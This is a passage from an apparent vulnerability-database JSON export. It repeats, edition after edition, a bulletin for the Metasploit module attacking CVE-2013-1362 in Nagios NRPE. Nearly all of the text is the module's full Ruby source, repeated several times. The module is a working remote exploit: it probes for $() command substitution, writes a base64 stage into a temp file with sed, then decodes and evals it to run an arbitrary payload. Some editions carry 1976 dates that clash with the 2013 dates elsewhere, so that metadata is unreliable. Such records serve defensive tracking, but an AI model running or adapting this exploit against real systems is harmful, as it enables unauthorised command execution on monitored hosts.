information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T04:13:24", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T06:13:17", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T06:13:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T06:13:17", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T20:14:23", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T20:14:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T20:14:23", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T22:14:58", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T22:14:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T22:14:58", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-06T20:15:10", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-06T20:15:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
